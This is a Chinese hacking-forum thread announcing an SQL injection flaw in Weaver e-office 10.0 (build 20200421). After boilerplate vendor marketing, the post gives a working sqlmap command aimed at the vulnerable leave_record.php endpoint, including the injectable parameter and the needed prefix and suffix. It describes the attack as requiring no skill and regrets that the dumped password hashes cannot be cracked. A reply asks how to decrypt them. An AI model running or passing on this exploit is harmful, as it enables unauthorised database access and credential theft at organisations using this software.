查看: 34646|回复: 1

泛微eoffice10-20200421注入漏洞

[复制链接]
发表于 2021-8-13 19:06:26 | 显示全部楼层 |阅读模式
泛微品牌影响力:

20年 专注OA的研发创新
OA软件领域 首家 主板上市公司
协同行业 “国家 重点 软件企业”
全国 200多个 本地化服务机构
中国高端移动办公协同OA的专业厂商


  泛微e-office深谙改革之道以迎变革之机,沉心产品研发数十载之久,全新产品e-office10.0正式上线,力求为用户提供更极致、更优质的产品体验。
  e-office10.0无论是在安全性、扩展性还是智能性方面,都进行了一次完美蜕变。在原版本基础上,V10.0主要具有10项优势。
  全新上线的e-office10.0在产品性能上做了进一步提升,无论是在安全性、扩展性还是智能性方面,都进行了一次完美蜕变。

漏洞存在的版本:
V10.0-20200421
QQ截图20210813184746.jpg

注入点位置:
[PHP] 查看源码 复制代码
python sqlmap.py -u "http://127.0.0.1:8010/eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10" --prefix="') " --suffix="%23" -p run_id


PS:table_field=*也可以

放进sqlmap直接跑就可以,无门槛~
缺陷是跑出来的密文无法解密,蛋疼的很
QQ截图20210813185315.jpg
回复

使用道具 举报

发表于 5 天前 | 显示全部楼层

Re: 泛微eoffice10-20200421注入漏洞

感谢分享这个漏洞信息!注入点分析得很清楚,sqlmap直接跑确实方便。 不过最后提到的密文无法解密确实比较遗憾,是不是因为e-office 10.0的密码加密方式比较特殊(比如加盐或者自定义算法)?如果有解密思路或者能拿到密钥的话,这个洞的价值就更高了。 另外,想问一下这个漏洞是否影响更新版本(比如20200421之后的补丁)?还是说只局限于这个特定时间点?期待进一步测试结果。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-5-24 19:32 , Processed in 0.027353 second(s), 22 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部